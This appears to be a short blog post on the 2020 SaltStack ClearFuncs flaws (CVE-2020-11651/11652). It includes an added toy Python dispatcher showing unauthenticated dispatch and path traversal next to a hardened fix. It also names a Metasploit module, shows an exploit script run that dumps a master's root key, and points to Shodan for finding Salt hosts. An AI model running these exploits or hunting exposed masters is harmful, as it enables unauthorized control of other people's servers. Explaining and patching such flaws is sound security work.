Hacking Salt Stack 2020

Today's exploit covers two CVEs affecting the popular DevOps tool Salt.
Salt is a tool for system administrators to manage and carry out tasks on many computers at once,
such as upgrading a large set of machines. Thanks to its ease of use and the wide
variety of supported platforms, the tool has grown a bigger and bigger user base and even has a
yearly conference called SaltConf (https://saltconf.com/).
Two new vulnerabilities were found that were so serious that Salt itself is showing
a notice on its main page advising people to patch
their Salt instances.


ClearFuncs, the component responsible for handling the
authentication and key exchange between a Salt master
and its minions, does not validate authentication when dispatching calls to its methods and functions.
This allows a malicious third party to call those functions without any authentication,
which in turn can be used to run and execute malicious commands on clients.

Check out ClearFuncs on github:


ClearFuncs also allows arbitrary access to methods that can give
an unauthenticated user access to system directories.
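To make the two weaknesses described above concrete, here is an added example (not Salt's code, and not taken from the original post) of a minimal RPC dispatcher that shows the same two defects side by side with a hardened version: a dispatcher that forwards any method name the caller supplies and never checks a credential, and a file-serving method that does not confine the requested path to its root directory. The class names, the "token" credential and the tiny on-disk layout are all hypothetical and constructed for the demo; the hardened version uses an explicit allowlist of public methods, checks the credential before dispatch, and resolves paths with realpath so a traversal cannot leave the served directory.

```python
"""
Added example, not Salt's code: a toy RPC dispatcher with the two weaknesses
the post describes (unauthenticated method dispatch, unconfined file paths)
next to a hardened version. All names and data here are constructed.
"""
import hmac
import os
import secrets
import shutil
import tempfile


class VulnerableDispatcher:
    """Forwards whatever method name the caller asks for. The only guard is a
    prefix check, so a 'private' helper is still reachable, and no credential
    is ever verified before dispatch."""

    def __init__(self, root_token, file_root):
        self._root_token = root_token
        self._file_root = file_root

    def _reveal_root_token(self):           # meant to be internal only
        return self._root_token

    def file_read(self, path):
        # Naive join: a path such as '../x' walks out of file_root.
        with open(os.path.join(self._file_root, path)) as fh:
            return fh.read()

    def run(self, payload):
        cmd = payload["cmd"]
        if cmd.startswith("__"):            # blocks dunder names only
            return {"error": "unknown method"}
        func = getattr(self, cmd)           # reaches single-underscore helpers
        return {"return": func(**payload.get("kwargs", {}))}


class HardenedDispatcher:
    """Explicit allowlist, credential check before dispatch, and paths
    confined to the served directory."""

    PUBLIC_METHODS = frozenset({"file_read"})

    def __init__(self, root_token, file_root):
        self._root_token = root_token
        self._file_root = os.path.realpath(file_root)

    def _authorized(self, token):
        # Constant-time comparison; None (no token supplied) is rejected.
        return token is not None and hmac.compare_digest(token, self._root_token)

    def file_read(self, path):
        target = os.path.realpath(os.path.join(self._file_root, path))
        if os.path.commonpath([target, self._file_root]) != self._file_root:
            raise PermissionError("path escapes file root")
        with open(target) as fh:
            return fh.read()

    def run(self, payload):
        cmd = payload.get("cmd")
        if cmd not in self.PUBLIC_METHODS:  # allowlist, not a prefix denylist
            return {"error": "unknown method"}
        if not self._authorized(payload.get("token")):
            return {"error": "authentication required"}
        try:
            return {"return": getattr(self, cmd)(**payload.get("kwargs", {}))}
        except PermissionError as exc:
            return {"error": str(exc)}


def demo():
    """Build a constructed directory layout, run the same requests against
    both dispatchers, and return the results plus the token used."""
    base = tempfile.mkdtemp()
    file_root = os.path.join(base, "srv")
    os.mkdir(file_root)
    with open(os.path.join(file_root, "ok.txt"), "w") as fh:
        fh.write("public")
    with open(os.path.join(base, "secret.txt"), "w") as fh:   # outside srv/
        fh.write("secret")
    token = secrets.token_hex(16)
    vuln = VulnerableDispatcher(token, file_root)
    hard = HardenedDispatcher(token, file_root)
    results = {
        "vuln_private": vuln.run({"cmd": "_reveal_root_token"}),
        "vuln_traversal": vuln.run({"cmd": "file_read",
                                    "kwargs": {"path": "../secret.txt"}}),
        "hard_private": hard.run({"cmd": "_reveal_root_token"}),
        "hard_no_token": hard.run({"cmd": "file_read",
                                   "kwargs": {"path": "ok.txt"}}),
        "hard_traversal": hard.run({"cmd": "file_read", "token": token,
                                    "kwargs": {"path": "../secret.txt"}}),
        "hard_ok": hard.run({"cmd": "file_read", "token": token,
                             "kwargs": {"path": "ok.txt"}}),
    }
    shutil.rmtree(base)
    return results, token


if __name__ == "__main__":
    for name, value in demo()[0].items():
        print(f"{name}: {value}")
```

The point of the allowlist over a prefix denylist is that anything not deliberately published is unreachable, so adding a new internal helper can never silently widen the attack surface; the realpath plus commonpath check catches both `..` segments and symlinks that point outside the served tree.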


Metasploit (“metasploit-framework/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb”) was quick to add
a module that exploits these vulnerabilities.


root@kalimah:~/salt# python3 exploit.py --master
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Salt version: 3000.1
[ ] This version of salt is vulnerable! Check results below
[+] Checking salt-master (ip:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651...
[*] root key obtained: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=

Find salt hosts:

shodan salt stack hosts